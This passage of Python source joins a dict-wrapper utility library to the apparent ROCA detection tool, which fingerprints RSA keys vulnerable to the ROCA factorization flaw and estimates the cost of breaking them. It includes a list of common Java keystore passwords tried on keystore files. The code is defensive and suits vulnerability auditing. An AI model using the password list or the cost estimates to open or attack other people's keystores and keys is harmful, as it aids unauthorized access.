elif isinstance(value, Raw): return value.value elif isinstance(value, dict): if isinstance(self, CaseInsensitiveObject): return CaseInsensitiveObject(value) else: return Object(value) else: return value def __protect__(self, key, value=sentinel): """Protected keys add its parents, not sure if useful""" if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.get(key).protect(path, value) elif value is not sentinel: self[key] = value if key not in self: raise KeyError('key %s has no value to protect' % key) self.__PROTECTED__.add(key) #Object.key sets def __setattr__(self, name, value): bad_ids = dir(self) #Add some just for causion bad_ids.append('__call__') bad_ids.append('__dir__') if name in self.__PROTECTED__: raise KeyError('key %r is read only' % name) if name not in bad_ids: if self.__dict__.get('__PARENT__'): #Do all the black magic with making sure my parents exist parent, pname = self.__dict__.pop('__PARENT__') parent[pname] = self #Get rid of cached future children that match name if name in self.__CACHE__: del self.__CACHE__[name] dict.__setitem__(self, name, self.__wrap(value)) else: print("%s is an invalid identifier" % name) print("identifiers can not be %r" % bad_ids) raise KeyError('bad identifier') #Object.key gets def __getattr__(self, key): return self.get(key) #Dict like functionality and xpath like access def __getitem__(self, key, default=sentinel): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: return self.get(key).__getitem__(path, default) elif key not in self: if default is sentinel: #Return a parentless object (this might be evil) #CACHE it return self.__CACHE__.setdefault( key, self.__class__(__PARENT__=(self, key))) else: return default else: return dict.get(self, key) get = __getitem__ def __contains__(self, key): """ contains method with key paths support """ if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] this, next = key.pop(0), key if this in self.iterkeys(): if len(next) > 0: return next in self.get(this) else: return True else: return False has_key = __contains__ def setdefault(self, key, default=None): if key not in self: self[key] = default return self.get(key) #Allow address keys 'key.key.key' def __setitem__(self, key, value): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.setdefault(key, {}).__setitem__(path, value) else: self.__setattr__(key, value) set = __setitem__ #Allow del by 'key.key.key' def __delitem__(self, key): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] key, path = key.pop(0), key if len(path) > 0: self.get(key).__delitem__(path) # Pass the delete down else: if key not in self: pass # This should handle itself else: dict.__delitem__(self, key) __delattr__ = __delitem__ class CaseInsensitiveObject(Object): """A Case Insensitive Version of data.Object""" def __protect__(self, key, value=sentinel): Object.__protect__(self, key.lower(), value) def __getitem__(self, key, default=sentinel): if isinstance(key, list): key = [x.lower() if isinstance(x, basestring) else x for x in key] elif isinstance(key, basestring): key = key.lower() return Object.__getitem__(self, key, default) get = __getitem__ def __setattr__(self, key, value): if isinstance(key, basestring): key = 
key.lower() return Object.__setattr__(self, key, value) def __contains__(self, key): if not isinstance(key, list): key = key.split('.') if isinstance(key, basestring) else [key] if isinstance(key[0], basestring): key[0] = key[0].lower() return Object.__contains__(self, key) has_key = __contains__ def __getattr__(self, key): if key in self: return self.get(key) else: return Object.__getattr__(self, key) def __delattr__(self, key): if isinstance(key, basestring): key = key.lower() return Object.__delattr__(self, key) __delitem__ = __delattr__ class Collection(list): """Special Lists so [dicts,[dict,dict]] within get converted""" def __init__(self, alist=None, default=Object): if alist is None: alist = () super(Collection, self).__init__(alist) self.__default = default #Makes sure all the conversions happen for i in xrange(0, len(self)): self[i] = self[i] def __wrap(self, value): if isinstance(value, dict): return self.__default(value) elif isinstance(value, self.__class__): return value # Do Not Re-wrap elif isinstance(value, list): return self.__class__(value, self.__default) else: return value def __setitem__(self, key, value): super(Collection, self).__setitem__(key, self.__wrap(value)) def __getslice__(self, s, e): return self.__class__(super(Collection, self).__getslice__(s, e), self.__default) def append(self, value): list.append(self, self.__wrap(value)) def extend(self, alist): for i in alist: self.append(i) def insert(self, key, value): list.insert(self, key, self.__wrap(value)) def shift(self): return self.pop(0) def unshift(self, value): self.insert(0, value) push = append
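# Hedged usage sketch for Object / Collection above. As written the module is
# Python 2 only (it relies on basestring, iterkeys and xrange); the keys and
# values below are illustrative.
cfg = Object()
cfg['server.http.port'] = 8080          # dotted keys build nested Objects
cfg.server.http.host = 'localhost'      # attribute chains do the same via __PARENT__
print(cfg.server.http.port)             # -> 8080
print('server.http.host' in cfg)        # -> True (path-aware __contains__)

cfg.handlers = [{'name': 'static'}]     # lists of dicts become a Collection of Objects
print(cfg.handlers[0].name)             # -> 'static'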
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Key fingerprinting The fingerprinter supports the following formats: - X509 Certificate, DER encoded, one per file, *.der, *.crt - X509 Certificate, PEM encoded, more per file, *.pem - RSA PEM encoded private key, public key, more per file, *.pem (has to have correct header -----BEGIN RSA...) - SSH public key, *.pub, starting with "ssh-rsa", one per line - ASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header -----BEGIN PGP... - APK android application, *.apk - one modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded number - JSON file with moduli, one record per line, record with modulus has key "mod" (int, base64, hex, dec encoding supported) certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER. - LDIFF file - LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificate - Java Key Store file (JKS). Tries empty password & some common, specify more with --jks-pass-file - PKCS7 signature with user certificate. Script requirements: - Tested on Python 2.7.13, 3.4, 3.5, 3.6 - pip install cryptography pgpdump coloredlogs future six pycrypto>=2.6 python-dateutil pyx509_ph4 apk_parse_ph4 pyjks M2Crypto - some system packages are usually needed for pip to install dependencies (like gcc): sudo sudo yum install python-devel python-pip gcc gcc-c++ make automake autoreconf libtool openssl-devel libffi-devel dialog sudo apt-get install python-pip python-dev build-essential libssl-dev libffi-dev https://github.com/crocs-muni/roca https://roca.crocs.fi.muni.cz """ from future.utils import iteritems from builtins import bytes from past.builtins import basestring from past.builtins import long from functools import reduce import json import argparse import logging import coloredlogs import base64 import hashlib import sys import os import re import math import itertools import binascii import collections import traceback import datetime from math import ceil, log # '%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s' LOG_FORMAT = '%(asctime)s [%(process)d] %(levelname)s %(message)s' logger = logging.getLogger(__name__) coloredlogs.install(level=logging.INFO, fmt=LOG_FORMAT) # # Helper functions & classes # def strip_hex_prefix(x): """ Strips possible hex prefixes from the strings :param x: :return: """ if startswith(x, '0x'): return x[2:] if startswith(x, '\\x'): return x[2:] return x def error_message(e, message=None, cause=None): """ Formats exception message + cause :param e: :param message: :param cause: :return: formatted message, includes cause if any is set """ if message is None and cause is None: return None elif message is None: return '%s, caused by %r' % (e.__class__, cause) elif cause is None: return message else: return '%s, caused by %r' % (message, cause) def format_pgp_key(key): """ Formats PGP key in 16hex digits :param key: :return: """ if key is None: return None if isinstance(key, (int, long)): return '%016x' % key elif isinstance(key, list): return [format_pgp_key(x) for x in key] else: key = key.strip() key = strip_hex_prefix(key) return format_pgp_key(int(key, 16)) def defval(val, default=None): """ Returns val if is not None, default instead :param val: :param default: :return: """ return val if val is not None else default def defvalkey(js, key, default=None, take_none=True): """ Returns js[key] if set, otherwise default. 
Note js[key] can be None. :param js: :param key: :param default: :param take_none: :return: """ if js is None: return default if key not in js: return default if js[key] is None and not take_none: return default return js[key] def drop_none(arr): """ Drop none from the list :param arr: :return: """ if arr is None: return arr return [x for x in arr if x is not None] def drop_empty(arr): """ Drop empty array element :param arr: :return: """ return [x for x in arr if not isinstance(x, list) or len(x) > 0] def add_res(acc, elem): """ Adds results to the accumulator :param acc: :param elem: :return: """ if not isinstance(elem, list): elem = [elem] if acc is None: acc = [] for x in elem: acc.append(x) return acc def flatten(iterable): """ Non-recursive flatten. :param iterable: :return: """ try: iterator, sentinel, stack = iter(iterable), object(), [] except TypeError: yield iterable return while True: value = next(iterator, sentinel) if value is sentinel: if not stack: break iterator = stack.pop() elif isinstance(value, str): yield value else: try: new_iterator = iter(value) except TypeError: yield value else: stack.append(iterator) iterator = new_iterator def try_get_dn_part(subject, oid=None): """ Tries to extracts the OID from the X500 name. :param subject: :param oid: :return: """ try: if subject is None: return None if oid is None: return None for sub in subject: if oid is not None and sub.oid == oid: return sub.value except: pass return None def try_get_dn_string(subject, shorten=False): """ Returns DN as a string :param subject: :param shorten: :return: """ try: from cryptography.x509.oid import NameOID from cryptography.x509 import ObjectIdentifier oid_names = { getattr(NameOID, 'COMMON_NAME', ObjectIdentifier("2.5.4.3")): "CN", getattr(NameOID, 'COUNTRY_NAME', ObjectIdentifier("2.5.4.6")): "C", getattr(NameOID, 'LOCALITY_NAME', ObjectIdentifier("2.5.4.7")): "L", getattr(NameOID, 'STATE_OR_PROVINCE_NAME', ObjectIdentifier("2.5.4.8")): "ST", getattr(NameOID, 'STREET_ADDRESS', ObjectIdentifier("2.5.4.9")): "St", getattr(NameOID, 'ORGANIZATION_NAME', ObjectIdentifier("2.5.4.10")): "O", getattr(NameOID, 'ORGANIZATIONAL_UNIT_NAME', ObjectIdentifier("2.5.4.11")): "OU", getattr(NameOID, 'SERIAL_NUMBER', ObjectIdentifier("2.5.4.5")): "SN", getattr(NameOID, 'USER_ID', ObjectIdentifier("0.9.2342.19200300.100.1.1")): "userID", getattr(NameOID, 'DOMAIN_COMPONENT', ObjectIdentifier("0.9.2342.19200300.100.1.25")): "domainComponent", getattr(NameOID, 'EMAIL_ADDRESS', ObjectIdentifier("1.2.840.113549.1.9.1")): "emailAddress", getattr(NameOID, 'POSTAL_CODE', ObjectIdentifier("2.5.4.17")): "ZIP", } ret = [] try: for attribute in subject: oid = attribute.oid dot = oid.dotted_string oid_name = oid_names[oid] if shorten and oid in oid_names else oid._name val = attribute.value ret.append('%s: %s' % (oid_name, val)) except: pass return ', '.join(ret) except Exception as e: logger.warning('Unexpected error: %s' % e) return 'N/A' def utf8ize(x): """ Converts to utf8 if non-empty :param x: :return: """ if x is None: return None return x.encode('utf-8') def startswith(haystack, prefix): """ py3 comp startswith :param haystack: :param prefix: :return: """ if haystack is None: return None if sys.version_info[0] < 3: return haystack.startswith(prefix) return to_bytes(haystack).startswith(to_bytes(prefix)) def to_string(x): """ Utf8 conversion :param x: :return: """ if isinstance(x, bytes): return x.decode('utf-8') if isinstance(x, basestring): return x def to_bytes(x): """ Byte conv :param x: :return: """ if 
isinstance(x, bytes): return x if isinstance(x, basestring): return x.encode('utf-8') def contains(haystack, needle): """ py3 contains :param haystack: :param needle: :return: """ if sys.version_info[0] < 3: return needle in haystack else: return to_bytes(needle) in to_bytes(haystack) def strip_spaces(x): """ Strips spaces :param x: :return: """ x = x.replace(b' ', b'') x = x.replace(b'\t', b'') return x def strip_pem(x): """ Strips PEM to bare base64 encoded form :param x: :return: """ if x is None: return None x = to_string(x) pem = x.replace('-----BEGIN CERTIFICATE-----', '') pem = pem.replace('-----END CERTIFICATE-----', '') pem = re.sub(r'-----BEGIN .+?-----', '', pem) pem = re.sub(r'-----END .+?-----', '', pem) pem = pem.replace(' ', '') pem = pem.replace('\t', '') pem = pem.replace('\r', '') pem = pem.replace('\n', '') return pem.strip() def pem_to_der(x): """ Converts PEM to DER :param x: :return: """ if x is None: return None pem = strip_pem(x) return base64.b64decode(pem) def unix_time(dt): if dt is None: return None cur = datetime.datetime.utcfromtimestamp(0) if dt.tzinfo is not None: cur.replace(tzinfo=dt.tzinfo) return (dt - cur).total_seconds() class Tracelogger(object): """ Prints traceback to the debugging logger if not shown before """ def __init__(self, logger=None): self.logger = logger self._db = set() def log(self, cause=None, do_message=True, custom_msg=None): """ Loads exception data from the current exception frame - should be called inside the except block :return: """ message = error_message(self, cause=cause) exc_type, exc_value, exc_traceback = sys.exc_info() traceback_formatted = traceback.format_exc() traceback_val = traceback.extract_tb(exc_traceback) md5 = hashlib.md5(traceback_formatted.encode('utf-8')).hexdigest() if md5 in self._db: # self.logger.debug('Exception trace logged: %s' % md5) return if custom_msg is not None and cause is not None: self.logger.debug('%s : %s' % (custom_msg, cause)) elif custom_msg is not None: self.logger.debug(custom_msg) elif cause is not None: self.logger.debug('%s' % cause) self.logger.debug(traceback_formatted) self._db.add(md5) class AutoJSONEncoder(json.JSONEncoder): """ JSON encoder trying to_json() first """ def default(self, obj): try: return obj.to_json() except AttributeError: return self.default_classic(obj) def default_classic(self, o): from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers if isinstance(o, set): return list(o) elif isinstance(o, RSAPublicNumbers): return {'n': o.n, 'e': o.e} else: return super(AutoJSONEncoder, self).default(o) class TestResult(object): """ Fingerprint test result holder. 
""" def __init__(self, data=None, **kwargs): self._data = collections.OrderedDict(data if data is not None else {}) for key, value in iteritems(kwargs): self._data[key] = value @property def type(self): return defvalkey(self._data, 'type') @property def marked(self): return defvalkey(self._data, 'marked', False) @property def n(self): return defvalkey(self._data, 'n') @property def time_years(self): return defvalkey(self._data, 'time_years') @property def price_aws_c4(self): return defvalkey(self._data, 'price_aws_c4') def __getattr__(self, item): if item in self._data: return self._data[item] return None def to_json(self): self._data['marked'] = self.marked self._data['type'] = self.type return self._data class ImportException(Exception): """Import exception used with optional dependencies""" def __init__(self, message=None, cause=None): super(ImportException, self).__init__(message) class DlogFprint(object): """ Discrete logarithm (dlog) fingerprinter for ROCA. Exploits the mathematical prime structure described in the paper. No external python dependencies are needed (for sake of compatibility). Detection could be optimized using sympy / gmpy but that would add significant dependency overhead. """ def __init__(self, max_prime=167, generator=65537): self.primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167] self.max_prime = max_prime self.generator = generator self.m, self.phi_m = self.primorial(max_prime) self.phi_m_decomposition = DlogFprint.small_factors(self.phi_m, max_prime) self.generator_order = DlogFprint.element_order(generator, self.m, self.phi_m, self.phi_m_decomposition) self.generator_order_decomposition = DlogFprint.small_factors(self.generator_order, max_prime) logger.debug('Dlog fprint data: max prime: %s, generator: %s, m: %s, phi_m: %s, phi_m_dec: %s, ' 'generator_order: %s, generator_order_decomposition: %s' % (self.max_prime, self.generator, self.m, self.phi_m, self.phi_m_decomposition, self.generator_order, self.generator_order_decomposition)) def fprint(self, modulus): """ Returns True if fingerprint is present / detected. 
:param modulus: :return: """ if modulus <= 2: return False d = DlogFprint.discrete_log(modulus, self.generator, self.generator_order, self.generator_order_decomposition, self.m) return d is not None def primorial(self, max_prime=167): """ Returns primorial (and its totient) with max prime inclusive - product of all primes below the value :param max_prime: :param dummy: :return: primorial, phi(primorial) """ mprime = max(self.primes) if max_prime > mprime: raise ValueError('Current primorial implementation does not support values above %s' % mprime) primorial = 1 phi_primorial = 1 for prime in self.primes: primorial *= prime phi_primorial *= prime - 1 return primorial, phi_primorial @staticmethod def prime3(a): """ Simple trial division prime detection :param a: :return: """ if a < 2: return False if a == 2 or a == 3: return True # manually test 2 and 3 if a % 2 == 0 or a % 3 == 0: return False # exclude multiples of 2 and 3 max_divisor = int(math.ceil(a ** 0.5)) d, i = 5, 2 while d <= max_divisor: if a % d == 0: return False d += i i = 6 - i # this modifies 2 into 4 and vice versa return True @staticmethod def is_prime(a): return DlogFprint.prime3(a) @staticmethod def prime_factors(n, limit=None): """ Simple trial division factorization :param n: :param limit: :return: """ num = [] # add 2, 3 to list or prime factors and remove all even numbers(like sieve of ertosthenes) while n % 2 == 0: num.append(2) n = n // 2 while n % 3 == 0: num.append(3) n = n // 3 max_divisor = int(math.ceil(n ** 0.5)) if limit is None else limit d, i = 5, 2 while d <= max_divisor: while n % d == 0: num.append(d) n = n // d d += i i = 6 - i # this modifies 2 into 4 and vice versa # if no is > 2 i.e no is a prime number that is only divisible by itself add it if n > 2: num.append(n) return num @staticmethod def factor_list_to_map(factors): """ Factor list to map factor -> power :param factors: :return: """ ret = {} for k, g in itertools.groupby(factors): ret[k] = len(list(g)) return ret @staticmethod def element_order(element, modulus, phi_m, phi_m_decomposition): """ Returns order of the element in Zmod(modulus) :param element: :param modulus: :param phi_m: phi(modulus) :param phi_m_decomposition: factorization of phi(modulus) :return: """ if element == 1: return 1 # by definition if pow(element, phi_m, modulus) != 1: return None # not an element of the group order = phi_m for factor, power in list(phi_m_decomposition.items()): for p in range(1, power + 1): next_order = order // factor if pow(element, next_order, modulus) == 1: order = next_order else: break return order @staticmethod def chinese_remainder(n, a): """ Solves CRT for moduli and remainders :param n: :param a: :return: """ sum = 0 prod = reduce(lambda a, b: a * b, n) for n_i, a_i in zip(n, a): p = prod // n_i sum += a_i * DlogFprint.mul_inv(p, n_i) * p return sum % prod @staticmethod def mul_inv(a, b): """ Modular inversion a mod b :param a: :param b: :return: """ b0 = b x0, x1 = 0, 1 if b == 1: return 1 while a > 1: q = a // b a, b = b, a % b x0, x1 = x1 - q * x0, x0 if x1 < 0: x1 += b0 return x1 @staticmethod def small_factors(x, max_prime): """ Factorizing x up to max_prime limit. 
:param x: :param max_prime: :return: """ factors = DlogFprint.prime_factors(x, limit=max_prime) return DlogFprint.factor_list_to_map(factors) @staticmethod def discrete_log(element, generator, generator_order, generator_order_decomposition, modulus): """ Simple discrete logarithm :param element: :param generator: :param generator_order: :param generator_order_decomposition: :param modulus: :return: """ if pow(element, generator_order, modulus) != 1: # logger.debug('Powmod not one') return None moduli = [] remainders = [] for prime, power in list(generator_order_decomposition.items()): prime_to_power = prime ** power order_div_prime_power = generator_order // prime_to_power # g.div(generator_order, prime_to_power) g_dash = pow(generator, order_div_prime_power, modulus) h_dash = pow(element, order_div_prime_power, modulus) found = False for i in range(0, prime_to_power): if pow(g_dash, i, modulus) == h_dash: remainders.append(i) moduli.append(prime_to_power) found = True break if not found: # logger.debug('Not found :(') return None ccrt = DlogFprint.chinese_remainder(moduli, remainders) return ccrt # # Main fingerprinting tool # class RocaFingerprinter(object): """ Key fingerprinter """ def __init__(self, **kwargs): self.args = None self.trace_logger = Tracelogger(logger) self.jks_passwords = ['', 'changeit', 'chageit', 'root', 'server', 'test', 'alias', 'jks', 'tomcat', 'www', 'web', 'https'] kwargs.setdefault('do_print', False) self.jks_file_passwords = kwargs.get('jks_file_passwords') self.do_print = kwargs.get('do_print') # Minimal modulo size to avoid false positives on the random data and very short moduli kwargs.setdefault('minimal_modulus_bits', 256) kwargs.setdefault('minimal_modulus', 2**kwargs.get('minimal_modulus_bits')) self.minimal_modulus_bits = kwargs.get('minimal_modulus_bits') self.minimal_modulus = kwargs.get('minimal_modulus') self.tested = 0 self.num_rsa = 0 self.num_pem_certs = 0 self.num_pem_csr = 0 self.num_der_certs = 0 self.num_rsa_keys = 0 self.num_pgp_masters = 0 self.num_pgp_total = 0 self.num_ssh = 0 self.num_json = 0 self.num_apk = 0 self.num_ldiff_cert = 0 self.num_jks_cert = 0 self.num_pkcs7_cert = 0 self.found = 0 self.dlog_fprinter = DlogFprint() self.primes = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167] self.prints = [6, 30, 126, 1026, 5658, 107286, 199410, 8388606, 536870910, 2147483646, 67109890, 2199023255550, 8796093022206, 140737488355326, 5310023542746834, 576460752303423486, 1455791217086302986, 147573952589676412926, 20052041432995567486, 6041388139249378920330, 207530445072488465666, 9671406556917033397649406, 618970019642690137449562110, 79228162521181866724264247298, 2535301200456458802993406410750, 1760368345969468176824550810518, 50079290986288516948354744811034, 473022961816146413042658758988474, 10384593717069655257060992658440190, 144390480366845522447407333004847678774, 2722258935367507707706996859454145691646, 174224571863520493293247799005065324265470, 696898287454081973172991196020261297061886, 713623846352979940529142984724747568191373310, 1800793591454480341970779146165214289059119882, 126304807362733370595828809000324029340048915994, 11692013098647223345629478661730264157247460343806, 187072209578355573530071658587684226515959365500926] self.length_to_time_years = { 512: 0.000220562038803, 544: 0.00147111662211, 576: 0.00673857391044, 608: 0.0618100348655, 640: 0.281991193891, 672: 4.17998973277, 704: 39.5102151646, 
736: 3473.56982013, 768: 342674.912512, 800: 89394704.8817, 832: 8359663659.84, 864: 44184838761000.0, 896: -1, 928: -1, 960: -1, 992: 0.0658249816453, 1024: 0.266074841608, 1056: 1.28258930217, 1088: 7.38296771318, 1120: 20.2173702373, 1152: 58.9125352286, 1184: 415.827799825, 1216: 1536.17130832, 1248: 5415.49876704, 1280: 46281.7555548, 1312: 208675.856834, 1344: 1586124.1447, 1376: 13481048.41, 1408: 102251985.84, 1440: 1520923586.93, 1472: 30924687905.9, 1504: 1933367534430.0, 1536: 135663316837000.0, 1568: 7582543380680000.0, 1600: 5.1035570593e+17, 1632: 3.8899705405e+19, 1664: 3.66527648803e+21, 1696: 3.77984169396e+23, 1728: 5.14819714267e+25, 1760: 6.24593092623e+27, 1792: 8.73499845222e+29, 1824: 1.87621309001e+32, 1856: 2.9671795418e+34, 1888: -1, 1920: -1, 1952: -1, 1984: 28.6856385392, 2016: 60.644701708, 2048: 140.849490658, 2080: 269.272545592, 2112: 724.550220558, 2144: 1262.66048991, 2176: 3833.6903835, 2208: 7049.61288162, 2240: 14511.7355032, 2272: 41968.716653, 2304: 105863.580849, 2336: 509819.310451, 2368: 863135.14224, 2400: 3730089.12073, 2432: 14337269.1935, 2464: 55914941.3902, 2496: 144036102.003, 2528: 972239354.935, 2560: 1732510677.27, 2592: 10345329708.8, 2624: 72172778459.7, 2656: 386464106155.0, 2688: 1706310772440.0, 2720: 14920435519400.0, 2752: 77755063482200.0, 2784: 1237655413740000.0, 2816: 7524587305980000.0, 2848: 4.66421299974e+16, 2880: 5.41036780376e+17, 2912: 6.07066413463e+18, 2944: 6.17088797501e+19, 2976: 4.35440413514e+20, 3008: 1.04496910207e+22, 3040: 2.91790333753e+23, 3072: 2.84373206239e+25, 3104: 1.21552661668e+27, 3136: 1.14739892383e+29, 3168: 7.03739127786e+30, 3200: 5.5123347741e+32, 3232: 5.46349546772e+34, 3264: 3.07923071536e+36, 3296: 4.88872482194e+37, 3328: 4.74614877952e+39, 3360: 5.94743522012e+41, 3392: 3.63042884553e+43, 3424: 3.15382165869e+45, 3456: 4.22631927496e+47, 3488: 4.57325850696e+50, 3520: 7.58105156459e+52, 3552: 8.44988925164e+54, 3584: 2.1141023018e+57, 3616: 2.95898599696e+59, 3648: 7.23723533e+61, 3680: 6.0951282339e+62, 3712: 1.06824345519e+65, 3744: 1.85662696289e+67, 3776: 5.64628786015e+69, 3808: 1.38273039654e+72, 3840: -1, 3872: -1, 3904: -1, 3936: -1, 3968: 47950588.0004, 4000: 134211454.052, 4032: 201770331.337, 4064: 613149724.539, 4096: 1283252196.93, } # args init parser = self.init_parser() self.args = parser.parse_args(args=[]) def is_acceptable_modulus(self, modulus): """ Tests if modulus isn't too small :param modulus: :return: """ return not self.minimal_modulus or modulus >= self.minimal_modulus def has_fingerprint_moduli(self, modulus): """ Returns true if the fingerprint was detected in the key :param modulus: :return: """ if not self.is_acceptable_modulus(modulus): return False self.tested += 1 for i in range(0, len(self.primes)): if (1 << (modulus % self.primes[i])) & self.prints[i] == 0: return False self.found += 1 return True def has_fingerprint_dlog(self, modulus): """ Exact fingerprint using mathematical structure of the primes :param modulus: :return: """ if not self.is_acceptable_modulus(modulus): return False self.tested += 1 positive = self.dlog_fprinter.fprint(modulus) if positive: self.found += 1 return positive def switch_fingerprint_method(self, old=False): """ Switches main fingerprinting method. :param old: if True old fingerprinting method will be used. 
:return: """ if old: self.has_fingerprint = self.has_fingerprint_moduli else: self.has_fingerprint = self.has_fingerprint_dlog has_fingerprint_real = has_fingerprint_moduli has_fingerprint = has_fingerprint_dlog def mark_and_add_effort(self, modulus, json_info): """ Inserts factorization effort for vulnerable modulus into json_info :param modulus: :param json_info: :return: """ META_AMZ_FACT = 92. / 152. # conversion from university cluster to AWS AMZ_C4_PRICE = 0.1 # price of 2 AWS CPUs per hour length = int(ceil(log(modulus, 2))) length_ceiling = int(ceil(length / 32)) * 32 if length_ceiling in self.length_to_time_years: effort_time = self.length_to_time_years[length_ceiling] else: effort_time = -1 if effort_time > 0: effort_time *= META_AMZ_FACT # scaling to more powerful AWS CPU effort_price = effort_time * 365.25 * 24 * 0.5 * AMZ_C4_PRICE else: effort_price = -1 json_info['marked'] = True json_info['time_years'] = effort_time json_info['price_aws_c4'] = effort_price return json_info def file_matches_extensions(self, fname, extensions): """ True if file matches one of extensions :param fname: :param extensions: :return: """ if not isinstance(extensions, list): extensions = [extensions] for ext in extensions: if fname.endswith('.%s' % ext): return True return False def process_inputs(self): """ Processes input data :return: """ ret = [] files = self.args.files if files is None: return ret for fname in files: if fname == '-': if self.args.base64stdin: for line in sys.stdin: data = base64.b64decode(line) ret.append(self.process_file(data, fname)) continue else: fh = sys.stdin elif fname.endswith('.tar') or fname.endswith('.tar.gz'): sub = self.process_tar(fname) ret.append(sub) continue elif not os.path.isfile(fname): sub = self.process_dir(fname) ret.append(sub) continue else: fh = open(fname, 'rb') with fh: data = fh.read() sub = self.process_file(data, fname) ret.append(sub) return ret def process_tar(self, fname): """ Tar(gz) archive processing :param fname: :return: """ import tarfile # lazy import, only when needed ret = [] with tarfile.open(fname) as tr: members = tr.getmembers() for member in members: if not member.isfile(): continue fh = tr.extractfile(member) sub = self.process_file(fh.read(), member.name) ret.append(sub) return ret def process_dir(self, dirname): """ Directory processing :param dirname: :return: """ ret = [] sub_rec = [f for f in os.listdir(dirname)] for fname in sub_rec: full_path = os.path.join(dirname, fname) if os.path.isfile(full_path): with open(full_path, 'rb') as fh: sub = self.process_file(fh.read(), fname) ret.append(sub) elif os.path.isdir(full_path): sub = self.process_dir(full_path) ret.append(sub) return ret def process_file(self, data, name): """ Processes a single file :param data: :param name: :return: """ try: return self.process_file_autodetect(data, name) except Exception as e: logger.debug('Exception processing file %s : %s' % (name, e)) self.trace_logger.log(e) # autodetection fallback - all formats ret = [] logger.debug('processing %s as PEM' % name) ret.append(self.process_pem(data, name)) logger.debug('processing %s as DER' % name) ret.append(self.process_der(data, name)) logger.debug('processing %s as PGP' % name) ret.append(self.process_pgp(data, name)) logger.debug('processing %s as SSH' % name) ret.append(self.process_ssh(data, name)) logger.debug('processing %s as JSON' % name) ret.append(self.process_json(data, name)) logger.debug('processing %s as APK' % name) ret.append(self.process_apk(data, name)) logger.debug('processing %s 
as MOD' % name) ret.append(self.process_mod(data, name)) logger.debug('processing %s as LDIFF' % name) ret.append(self.process_ldiff(data, name)) logger.debug('processing %s as JKS' % name) ret.append(self.process_jks(data, name)) logger.debug('processing %s as PKCS7' % name) ret.append(self.process_pkcs7(data, name)) return ret def process_file_autodetect(self, data, name): """ Processes a single file - format autodetection :param data: :param name: :return: """ is_ssh_file = startswith(data, 'ssh-rsa') or contains(data, 'ssh-rsa ') is_pgp_file = startswith(data, '-----BEGIN PGP') is_pkcs7_file = startswith(data, '-----BEGIN PKCS7') is_pem_file = startswith(data, '-----BEGIN') and not is_pgp_file is_ldiff_file = contains(data, 'binary::') is_pgp = is_pgp_file or (self.file_matches_extensions(name, ['pgp', 'gpg', 'key', 'pub', 'asc']) and not is_ssh_file and not is_pem_file) is_pgp |= self.args.file_pgp is_crt_ext = self.file_matches_extensions(name, ['der', 'crt', 'cer', 'cert', 'x509', 'key', 'pub', 'ca']) is_pem = self.file_matches_extensions(name, 'pem') or is_pem_file is_pem |= self.args.file_pem is_der = not is_pem and not is_ssh_file and not is_pgp_file and is_crt_ext is_der |= self.args.file_der is_ssh = self.file_matches_extensions(name, ['ssh', 'pub']) or is_ssh_file is_ssh |= self.args.file_ssh is_apk = self.file_matches_extensions(name, 'apk') is_mod = self.file_matches_extensions(name, ['txt', 'mod', 'mods', 'moduli']) is_mod |= not is_pem and not is_der and not is_pgp and not is_ssh_file and not is_apk is_mod |= self.args.file_mod is_json = self.file_matches_extensions(name, ['json', 'js']) or startswith(data, '{') or startswith(data, '[') is_json |= self.args.file_json is_ldiff = self.file_matches_extensions(name, ['ldiff', 'ldap']) or is_ldiff_file is_ldiff |= self.args.file_ldiff is_jks = self.file_matches_extensions(name, ['jks', 'bks']) is_pkcs7 = self.file_matches_extensions(name, ['pkcs7', 'p7s', 'p7']) is_pkcs7 |= is_pkcs7_file is_pkcs7 |= self.args.file_pkcs7 det = is_pem or is_der or is_pgp or is_ssh or is_mod or is_json or is_apk or is_ldiff or is_jks ret = [] if is_pem: logger.debug('processing %s as PEM' % name) ret.append(self.process_pem(data, name)) if is_der: logger.debug('processing %s as DER' % name) ret.append(self.process_der(data, name)) if is_pgp: logger.debug('processing %s as PGP' % name) ret.append(self.process_pgp(data, name)) if is_ssh: logger.debug('processing %s as SSH' % name) ret.append(self.process_ssh(data, name)) if is_json: logger.debug('processing %s as JSON' % name) ret.append(self.process_json(data, name)) if is_apk: logger.debug('processing %s as APK' % name) ret.append(self.process_apk(data, name)) if is_mod: logger.debug('processing %s as MOD' % name) ret.append(self.process_mod(data, name)) if is_ldiff: logger.debug('processing %s as LDIFF' % name) ret.append(self.process_ldiff(data, name)) if is_jks: logger.debug('processing %s as JKS' % name) ret.append(self.process_jks(data, name)) if is_pkcs7: logger.debug('processing %s as PKCS7' % name) ret.append(self.process_pkcs7(data, name)) if not det: logger.debug('Undetected (skipped) file: %s' % name) return ret def process_pem(self, data, name): """ PEM processing - splitting further by the type of the records :param data: :param name: :return: """ try: ret = [] data = to_string(data) parts = re.split(r'-----BEGIN', data) if len(parts) == 0: return None if len(parts[0]) == 0: parts.pop(0) crt_arr = ['-----BEGIN' + x for x in parts] for idx, pem_rec in enumerate(crt_arr): pem_rec = 
